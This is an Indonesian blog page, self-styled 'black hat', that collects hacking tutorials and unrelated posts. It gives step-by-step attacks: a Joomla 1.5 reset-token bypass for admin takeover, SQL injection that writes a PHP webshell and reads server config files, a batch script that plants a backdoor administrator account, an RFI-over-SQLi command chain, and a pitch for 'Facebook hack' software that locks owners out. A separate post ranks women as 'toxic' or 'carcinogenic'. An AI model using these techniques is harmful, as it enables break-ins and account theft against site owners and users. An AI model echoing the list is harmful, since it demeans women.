Hack Joomla




Ha Ha Ha


mungkin tutor ini udah ada di benak anda..
tapi mohon maaf tutor ini hanya untuk teman² yang masih mencari cara mudah untuk hack joomla..
so buat yang udah tau tolong di bantu buat temen² kita yang masih blum tau & tolong jika saya salah nulis tutor atau ntah ada yang kurang mohon di kasi tau karna saling berbagi itu terasa indah..


ok kita langsung aja ke tutor nya :


Ini Adalah tutor Hack Joomla 1.5.0 dan 1.5.5


 1. Cari target situs yang akan di hack, bisa search by google dengan keyword situs joomla 1.5.0 setelah ketemu cari target yang tepat contoh www.target.com


2. buka : www.target.com/index.php?option=com_user&view=reset&layout=confirm


3. Masukkan karakter : ' pada kolom token


4. Isi Password baru


5. Buka : www.target.com/administrator/


6. Login admin dengan password anda

nah bagi teman² semua pemilik situs yang masih menggunakan Joomla 1.5.0 dan 1.5.5 dengan Username default ADMIN harap segera update, mengingat mudah sekali di hack


Ha Ha Ha


Sorry Klu Ada Yang Salah


Oh Iya Ada Yang Ketinggalan..


HARAP JANGAN DISALAH GUNAKAN ::)


::) ::) ITU CARA BUAT KITA BIAR BERHATI-HATI, JADI WASPADALAH....!!! :-* :-* :-*
0 comments

Backdoor webserver using MySQL SQL Injection

MySQL Database is a great product used by thousand of websites. Various web applications use MySQL as their default database. Some of these applications are written with security in mind, and some are not. In this article, I would like to show you how you can exploit SQL injection in order to gain almost full control over your webserver.

Most people know that SQL injection allows attackers to retrieve database records, pass login screens, change database content, through the creation of new administrative users. MySQL does not have a built-in command to execute shell commands, like Microsoft SQL server. I will show you how to run arbitrary commands using standard features provided by MySQL.

First of all, I would like to give a brief description of SQL injection, then I would like to present you with a couple less known methods that exist in MySQL, which I will use to backdoor a webserver. I will use 2 built-in MySQL commands - one that writes arbitrary files and the one that can be used to read arbitrary files. After that I will describe webshells and go to the attack itself.
What is SQL Injection?

SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.

For example, the following SQL command is used to validate user login requests:
$sql_query = "select * from users where user='$user' and password='$pass'"

If the user-submitted data is not properly validated, an attacker can exploit this query and pass the login screen by simply submitting specially crafter variables. For example, attacker can submit the following data as a $user variable: admin' or '1'='1 . When this $user variable is glued together with the query, it will look as followed:

$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'"


Now, the attacker can safely pass the login screen because or '1'='1' causes the query to always return a "true" value while ignoring the password value.

Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files

MySQL has a built-in command that can be used to create and write system files. This command has the following format:

mysq> select "text" INTO OUTFILE "file.txt"

One big drawback of this command is that it can be appended to an existing query using UNION SQL token.

For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'

Resulting query:
select user, password from user where user="admin" and password='123' union
select "text",2 into outfile "/tmp/file.txt" -- '

As a result of the above command, the /tmp/file.txt file will be created including the query result.
Command 2- Reading arbitrary files

MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.

mysql> select load_file("PATH_TO_FILE");
Webshell


Webshell is a polpular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands.

Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):


For example, in the following screenshot, id command is executed.



Attack Scenario

1. Find SQL injection

It is out of the scope of this document. You must first find SQL injection.

2. Find a directory with write permission

To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:

* hxxp://www.target.com/templates_compiled/
* hxxp://www.target.com/templates_c/
* hxxp://www.target.com/templates/
* hxxp://www.target.com/temporary/
* hxxp://www.target.com/images/
* hxxp://www.target.com/cache/
* hxxp://www.target.com/temp/
* hxxp://www.target.com/files/

In our example we will use a temp directory.

3. Exploit SQL injection - create web shell

You need to append the following string to the legitimate SQL command:

UNION SELECT "",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:

* 2,3,4 are just a qualifier that used to make the same number of columns as in the first part of the select query.
* /var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
* temp is a directory with full write access. In your case it could be a different directory.

The above command will write the query's result with the "" string appended. Because we added a php extension to the file name, this string will be treated as a PHP command and will allow us to execute shell commands!

4. Execute shell commands

Now it is the easiest part. Simply open the webserver to execute shell commands. In our example it will be:

* hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND

For example:

* hxxp://www.target.com/temp/c.php?cmd=id

Plan B

In case you failed to create a PHP file due to a wrong path, there are a number of workarounds:

1. Generate PHP errors.

You need to create a situation when a PHP script will fail and the full disk path will be printed in the error message. You can play with page parameters to make this happen.

2. Find the file that will print phpinfo().

In some cases you will be lucky and you will get a phpinfo() function executed. This function prints a wealth of PHP internal information including the current directory location.

Try to access the following urls:

* hxxp://www.target.com/phpinfo.php
* hxxp://www.target.com/test.php
* hxxp://www.target.com/info.php

3. Look for a default web directory location.

You need to get a default web directory location for a web server. Check the following page since it has a big list of default Apache configurations that are used in different distributions.
http://wiki.apache.org/httpd/DistrosDefaultLayout

4. Read the Apache configuration files.

MySQL has a built-in command that allows the attacker to read arbitrary files. We can exploit this command to read Apache configuration files and study directory structures. Simply use the load_file() MySQL function.

For example (SQL query after injection):
select user, password from user where user="admin123" and password='123' UNION select load_file("/etc/apache2/apache2.conf"), 2 -- '

Note:
You can find a location of Apache configurations at this resource:
http://wiki.apache.org/httpd/DistrosDefaultLayout
Limitation

In order to allow the above to work, the MySQL user used by this application must have a FILE permission. For example by default, a "root" user has this permission on. FILE is an administrative privilege that can only be granted globally (using ON *.* syntax).

For example, if the MySQL user was created using the following command, the user will have this FILE permission on.
GRANT ALL PERMISSIONS to *.* to 'USER_NAME'@'HOST_NAME' IDENTIFIED BY 'PASSWORD'
Countermeasures

1. Install the GreenSQL database firewall.

GreenSQL is an open source database firewall that can automatically block the commands described above: load_file and INTO OUTFILE. By default, GreenSQL blocks administrative and sensitive SQL commands. In addition, GreenSQL prevents SQL injections by calculating the risk of each query and blocking queries with high risk. For example , UNION token and SQL comments are taken into account. Check the application website for more information http://www.greensql.net/

2. Do not use MySQL root user to access the database.

Do not use administrative users to access the database. It is recommended to create a distinct user with hardened permissions to access specific databases.

3. Revoke FILE permission from the MySQL user used in your applications.

mysql> REVOKE FILE ON *.* from 'USER_NAME'@'HOST_NAME';

4. Application code review.

Ensure that your application does not have any SQL injections and that the code is updated.
Links

1. MySQL Injection Cheat Sheet
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

2. SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

3. MySQL Documentation
http://dev.mysql.com/doc/
0 comments

Hacking a Local Terminal

For the screenshots, I'll be using my Desktop PC and my Samsung Q1.

You will need a USB Flash Drive and a separate computer connected to the same network.

Wait until the target computer is available for use (maybe the person got up to check on something, who knows). As you enter the computer, you can do 2 things:

1) Have a batch ready on your flash drive. The code should be a little something like this:
@echo off
net user SupportUser codemachine /add
net localgroup administrators SupportUser /add


Good, this batch creates a backdoor administrator account on your target terminal. The second option was to do it by hand, but who wants to do that? The chances of having the time being cut short because of your flash drive being recognized are high, that's my opinion.

Go to the Control Panel > Administrative Tools > Services > Telnet
Make sure that the Telnet service is online.

Now scram, get out of there and head to your other computer. At a safe place, open up your Command prompt (or whatever you're using, I use Putty sometimes even though it sucks) and enter:
telnet 192.168.*.*
0 comments

RFI over SQL Injection/Cross-Site Scripting

An amusing attack was demonstrated in the course of the last penetration testing. It is a good example of practical application of Cross-Site Scripting. We had the following situation:

- User segment with an attacker (me) operating from it;
- Technological network with strictly restricted outgoing traffic;
- A web application in the technological network that is vulnerable to Remote File Including (RFI);
- A web application in the technological network that is vulnerable to SQL Injection.

SQL Injection per se didn’t allow us to exploit any useful threats and develop the attack (here it is, the dreadful effect of privilege minimization!). We also could not use the RFI vulnerability, because the traffic outgoing from the technological segment to the user segment and to the external environment was strictly restricted. For the purpose of exploitation of the RFI vulnerability, a chain like the following one was implemented:

http:///?param=http:///?param=1+union+select+''&cmd=passthru('ls');

That is, each of these tree vulnerabilities taken separately was useless. Only when they were combined for the common good purpose, they allowed us to exploit an information security threat, which was execution of arbitrary commands on the server :)

All in all, there is nothing supernatural here, but I found this attack to be rather amusing...

reference:http://ptresearch.blogspot.com/2010/01/rfi-over-sql-injectioncross-site.html
0 comments

Cewe dalam Ilmu Kimia

Corrosive

Cewe yang kurang suka melihat orang lain bahagia, dan bersifat 'korosif' bagi hubungan orang lain, dimana dia seringkali jadi orang ketiga dalam suatu pasangan, atau jadi penyebab rusaknya suatu hubungan pertemanan atau persahabatan orang lain. Cewe yang kurang bisa merawat barangnya sendiri, dan suka merusak barang orang lain / barang milik umum juga bisa dimasukkan pada kategori ini.


Oxidizer

Cewe yang bersifat sebagai 'oksidator' dalam suatu 'pembakaran', alias suka manas-manasin dalam suatu masalah (biasanya perselisihan) hingga satuorang atau lebih yang terlibat dalam masalah tersebut emosinya semakin meluap, atau suka bikin suatu masalah berbelit-belit sehingga masalah tersebut menjadi semakin sulit untuk dicari jalan keluarnya. Cewe seperti ini biasanya sangat senang melihatorang lain berantem dan suka turut campur dalam masalah orang lain.


Dangerous for the Environment

Cewe yang 'berbahaya bagi lingkungan (pandangan) sekitar', mungkin ditujukan bagi Cewe-Cewe yang norak atau 'alay', termasuk juga Cewe-Cewe yang jelek dan kurang enak untuk dipandang. Cewe seperti ini biasanya kurang bisa menjaga penampilan, dalam segi berpenampilan dapat dikatakan norak atau 'alay'; misalnya pergi ke mall memakai baju kampanye partai + jacket jeans + kacamata hitam murahan + celana hijau + highheels murahan, dandanannya menor, atau memakai baju dengan tulisan atau gambar yang norak, tidak jelas, atau 'maksa'. Termasuk juga Cewe yang bau karena malas mandi, atau jorok, atau juga Cewe yang jelek dan kurang enak untuk dipandang, tapi tetap 'keukeuh' memaksakan diri foto-foto alias narsis secara berlebihan. Kelakuan merekayang seperti ini seakan-akan membuat pandangan orang di sekitar menjadi 'gersang'.


Explosive

Cewe yang 'mudah meledak', maksudnya Cewe yang 'lebay', dimana Cewe ini sangat mudah terbawa perasaan. Contohnya ketika lagi sedih, dia nangis sampai teriak, guling-guling, atau merusak barang disekitar. Lagi marah atau berantem, dia sampai teriak-teriak hingga mengeluarkan kata-katayang kurang pantas. Lagi jatuh cinta dengan seseorang, dia 'mengejar' orang tersebut dengan agresifnya, bahkan hingga memaksa orang tersebut agar menjadi kekasihnya. Cewe seperti ini bisa jadi tontonan yang cukup 'mendebarkan', seperti halnya menonton suatu peristiwa ledakan.


Flammable

Cewe yang 'mudah terbakar' emosi, atau Cewe yang perasaannya sensitif ('sensian'). Misalnya kesal sedikit marah atau mengajak berantem, atau dipukul atau jatuh sedikit nangis. Termasukjuga Cewe yang sangat labil perasaannya dan sering 'geje' alias 'ga jelas' kelakuannya; marah-marah atau nangis tidak jelas. Cewe seperti ini biasanya gampang sekali mengajak berantem dan punya banyak musuh.


Toxic

Seperti lirik lagunya The Changcuters, wanita (Cewe) adalah racun (toksik) dunia. Namun istilah 'toksik' ini lebih spesifik, ditujukan bagi Ceweyang menjadi 'racun' bagi Cowo-Cowo disekitarnya. Cewe seperti ini umumnya berpenampilan menarik dan modis, namun dia suka memanfaatkan Cowo di sekitarnya bahkan menjadi Playgirl, alias Ceweyang suka memainkan Cowo. Beberapa Cewe ada juga yang dikategorikan sebagai Highly Toxic, yaitu Cewe yang 'sangat toksik', sebab dengan kelebihannya itu, dia mengajak Cowo di sekitarnya untuk melakukan hal-hal yang tidak baik dan diluar norma-norma, misalnya mengonsumsi narkoba atau seks bebas. Cewe seperti ini mungkin banyak ditemukan di klub-klub malam atau tempat-tempat dugem.


Harmful / Irritant

Cewe yang kelakuannya atau kata-katanya tajam, atau 'mengiritasi' orang di sekitarnya. Contohnya Cewe yang suka meremehkan orang lain dan menganggap orang lain rendah, dan suka bikin masalah di mana-mana. Cewe yang nakal, malas, kurang disiplin, dan meresahkan orang lain dapat masuk dalam kategori ini, sebab 'mengiritasi' sejumlah pihak, diantaranya orang tua, guru, atau masyarakat sekitar.


Carcinogenic

Karsinogenik berarti menyebabkan kanker, namun istilah kanker dalam hal ini diartikan sebagai 'kantong kering'. Cewe yang materialistis, mata duitan, boros, suka 'melorotin' Cowonya, dan banyak maunya, masuk dalam kategori ini. Cewe seperti ini diketahui dapat menimbulkan 'tumor ganas' dalam keuangan (hutang, Red.). Dilambangkan dengan simbol 'orang yang tubuhnya hancur', maksudnya berhubungan dengan Cewe semacam ini dapat 'menghancurkan' hidup Anda khususnya para Cowo, sebab mereka 'menyerang' salah satu aspek terpenting dalam hidup Anda, yaitu finansial.


Anda, khususnya para Cewe, termasuk pada kalangan yang manakah?
0 comments

Sekedar Tips

1. buat recana yang matang dan segera laksanakan

“Anda harus memilih tujuan-tujuan jangka panjang agar terbebas dari frustasi akibat kegagalan-kegagalan jangka pendek”

“apapun yang anda lakukan, berusahalah untuk melakukan yang terbaik. Jika anda ingin menjadi gelandangan, jadilah gelandangan yang baik”

“Tidak ada gunanya menuliskan rencana secara rapi diatas kertas bila tidak pernah dilaksanakan”


2. hentikan copy-paste

“ia yang meghargai pekerjaannya akan menghasilkan sesuatu yang baik dari pekerjaannya”

“setiap pekerjaan adalah potret dari orang yang melakukannya. Buatlah potret diri yang terbaik”

3. buat artikel yang menurut pembaca menarik

“Dalam membuat keputusan, berpikirlah seakan-akan Anda adalah pemilik perusahaan”

“pencapaian yang terhebat adalah saat seseorang memberikan keuntungan bagi orang lain”

“orang lain tidak peduli sebesar apa pengetahuan anda, sampai mereka menyadari betapa besar kepedulian Anda terhadap mereka”

4. lakukan blogwalking

“nampaknya kesuksesan berhubungan dengan tindakan. Orang sukses senantiasa bergerak. Mereka kerap melakukan kesalahan, tapi tetap tidak menyerah."

5. terima semua komentar dengan pikiran positif

“Salah satu hal terberat adalah menerima kritik, dan memanfaatkannya”

6. nikmati perjalanan blogging anda

“saat mengikuti balapan untuk meraih posisi terbaik, jangan lupa untuk menikmati perjalanan yang dilalui”


7. tentukan topic blog

"Kehidupan itu seperti bola, anda tidak akan kemana-mana sebelum mengetahui posisi gawang lawan."

8.buat artikel yang up to date.

“hari-hari yang kita lalui itu seperti koper-koper, semua berukuran sama; tetapi sebagian orang dapat memasukkan lebih banyak benda ke dalam koper-kopernya dibandingkan orang lain”

9.jangan menyerah

“jika sebuah pekerjaan telah dimulai, jangan pernah meninggalkannya sebelum selesai. Jadilah pekerja yang baik dalam pekerjaan anda, lakukan yang terbaik atau tidak sama sekali."

10. jangan mengunakan Black SEO

“kejujuran adalah batu penjuru dalam segala kesuksesan, tanpanya kepercayaan dan kemampuan diri tidak akan ada

11. jangan bangga dengan pagerank tinggi tapi sedikit pengunjung

“lebih banyak kepuasan dan kehormatan menjadi sopir truk kelas satu dari pada sopr eksekutif kelas sepuluh”

12. jangan iri dengan blog orang lain

“rumput tetangga mungkin Nampak lebih hijau, tapi rumput tersebut tetap harus dirawat”

13. berikan komentar di blog lain

resep menuju kebodahonan abadi adalah : puas dengan pendapat anda dan merasa berkecukupan dengan pengetahuan anda”

14. jangan merasa cepat puas

“seseorang seharusnya berusaha meraih lebih daripada yang telah ia gengam”

15. jangan posting artikel basi

“jangan berjalan mengikuti jejak yang telah dibuat orang lain. Jelajahilah daerah yang baru dan tinggalkan jejak yang dapat diikuti oleh orang lain”
0 comments

Cara Nge-hack Facebook Password.

Waduh judulnya serem bener Cara Nge-hack Facebook. Apa bisa menghack password facebook seseorang?. Jawabannya bisa, tapi ini hanya sebagai pembelajaran tolong jangan digunakan untuk iseng dan merugikan orang lain ya. Untuk Ngehack account facebook anda bisa menggunakan GZ’s Facebook. Cara kerjanya cukup simple, kita tinggal ketikan e-mail dari akun si yang punya facebook, kemudian klik Freeze. Nah ditunggu beberapa saat. Hasilnya, password si yang punya facebook akan berubah, dan dia tidak bisa kembali masuk ke dalam facebook miliknya (kejam bener!!!). Apabila kamu ingin mencobanya, silahkan download dulu software yang akan saya berikan dan coba pada account facebook kamu, tapi saya tidak bertanggung jawab apabila account kamu tidak bisa diakses.



Sekali lagi saya katakan :

Jangan Menggunakan software ini untuk mengerjai teman atau merugikan orang lain. Tips ini hanya untuk menambah wawasan saja. Silahkan Download software hack facebook (download).
1 comments

.:GOOGLE_HACK:.

Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada
Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan
defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari
ribuan website tampilan utamanya berubah.

Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik
dengan menggunakan Google. Pada bagian akhir juga terdapat trik-trik dan
keyword yang sering digunakan untuk melakukan pencarian file dan juga
bagaimana mencari target dengan memanfaatkan Google.


--- 01 // Penggunaan Dasar ------------

- Google tidak "case sensitive".
Keyword: linux = LINUX = LiNuX
Akan menghasilkan hal yang sama

- AND: Secara Default Google menggunakan keyword and.
Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"

- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah
satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: hacker OR c**c*er
Hasilnya pencarian akan mengandung kata "hacker" atau "c**c*er"

- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
"how" dan "where". Jika kata-kata umum ini begitu penting, anda
bisa menambahkan "+" didepan keyword tersebut.
Keyword: hacker how ==> Kata "how" akan diabaikan
Keyword: hacker +how ==> Kata "how" akan diikutsertakan

- -: Tanda minus "-" bisa digunakan untuk mengecualikan kata-kata
tertentu dalam pencarian. Misal kita ingin mencari kata
"linus tanpa linux", kita bisa menggunakan "linus -linux"

- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja*
Google tidak mencari kata "menjamu", "menjadi", "menjalar", dll
Google akan menghasilkan pencarian hanya yang mengandung kata
"menja".

Tetapi google mendukung penggunaan * dalam pencarian kalimat.
Keyword: "menjadi * hacker"
Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker",
"menjadi white hacker", dll.

- "": Dapat digunakan untuk mencari kata yg lengkap.
Keyword: "menjadi hacker"
Hasilnya pencarian akan mengandung kata "menjadi hacker"

- ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3



--- 02 // Operator Spesial ---------------

-- Contoh hasil pencarian --

Google --> Judul
... Language Tools. Ways to help with tsunami relief \
Advertising Programs - About Google ©2005 Google - > Deskripsi
Searching 8,058,044,651 web pages. /
www.google.com/ - 3k - 5 Jan 2005 --> URL

-- Contoh hasil pencarian --


- intitle: Untuk mencari kata-kata dari judul suatu halaman web.
Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman "Admin" dengan
deskripsi "Administrasi"

- allintitle: Untuk mencari kata-kata dari judul halaman web
secara lengkap.
Keyword: allintitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman yang mengandung
kata "Admin" dan "Administrasi"

- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dengan deskripsi "Administrasi"

- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dan "Administrasi"

- site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:echo.or.id
Semua pencarian hanya berdasarkan site "echo.or.id"

- cache: Ketika Googlebot mengindeks suatu situs, google akan
mengambil snapshot dari semua halaman yang telah terindeks.
Operator ini membantu melihat halaman-halaman yang telah
dicache.
Keyword: cache:echo.or.id
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya
pada snapshot/cache yang disimpan oleh Google.

- define: Operator ini digunakan untuk mencari definisi dari frasa
tertentu. Semua kata yang diketik setelah operator ini akan
diperlakukan sebagai satu frasa.
Keyword: define:hacker

- filetype: Jika kita mencari jenis file tertentu yang berisi informasi
yang anda inginkan kita bisa menggunakan operator ini.
Keyword: "hacker" filetype:pdf
Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html

- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa
menggunakan operator link.
Keyword: link:www.google.com

- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.
Keyword: related:www.google.com


--- 03 // Manipulasi URL Google ---------------

> And bisa mengganti interface google dengan mengganti variabel hl
(default google hl=en => bahasa inggris)
Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=id&lr=&q=site%3Aecho.or.id&btnG=Search

> Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini
dilakukan dengan modifikasi variabel lr.
(default google lr=lang_en => bahasa inggris)
Misalkan kita hasil pencarian hanya bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=lang_id&q=site%3Aecho.or.id&btnG=Search

> Secara default google akan menampilkan 10 site perhalaman. Anda dapat
mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel
num pada URL :D
Penggunaan num antara 1-100
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?num=100&hl=en&lr=&q=site%3Aecho.or.id&btnG=Search

> as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini
digunakan menentukan hasil berdasarkan bulan. x antara 1-12
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=&as_qdr=m1&q=site%3Aecho.or.id&btnG=Search

> safe=off: arti dari variabel ini filter "SafeSearch" dimatikan. "SafeSearch"
untuk memfilter hasil pencarian sexual.

Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer
sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih
dahulu (kecuali anda menggunakan brwoser yang support google secara built-in
atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat
bandwidth ke luar negeri :D
Karena bandwidth di Indonesia mahal ........

Contoh script google.html lengkap dengan varabielnya.

--- BOF google.html ---


Variabel num:

Variabel hl:

Variabel lr:

Variabel as_qdr:

Variabel safe:






--- EOF google.html ---


Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau
menambahkan apapun disana. Semuanya terserah kepada anda :D
Berikut merupakan script default pencarian google.

--- BOF google.html ---







--- EOF google.html ---

Google masih terus dikembangkan. Untuk melihat apa yang sedang
dikembangkan Google. Anda bisa ke http://labs.google.com


--- 04 // Tips & Tricks -----------------

Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan
operator-operator tersebut.

Ex:
- Keyword: site:echo.or.id, menghasilkan semua site echo.or.id. Kemudian
anda bisa mencoba keyword: site:echo.or.id hacker, akan menghasilkan
semua site echo.or.id yang mengandung kata hacker.

Kita juga dapat melakukan pencarian secara spesifik melalui google.
Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education

Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md
0 comments
Langganan: Postingan (Atom)
R3B3L - Design by : R3B3L @ 2010 - 2011 All Rights Reserved [+] We Are Black Hat [+]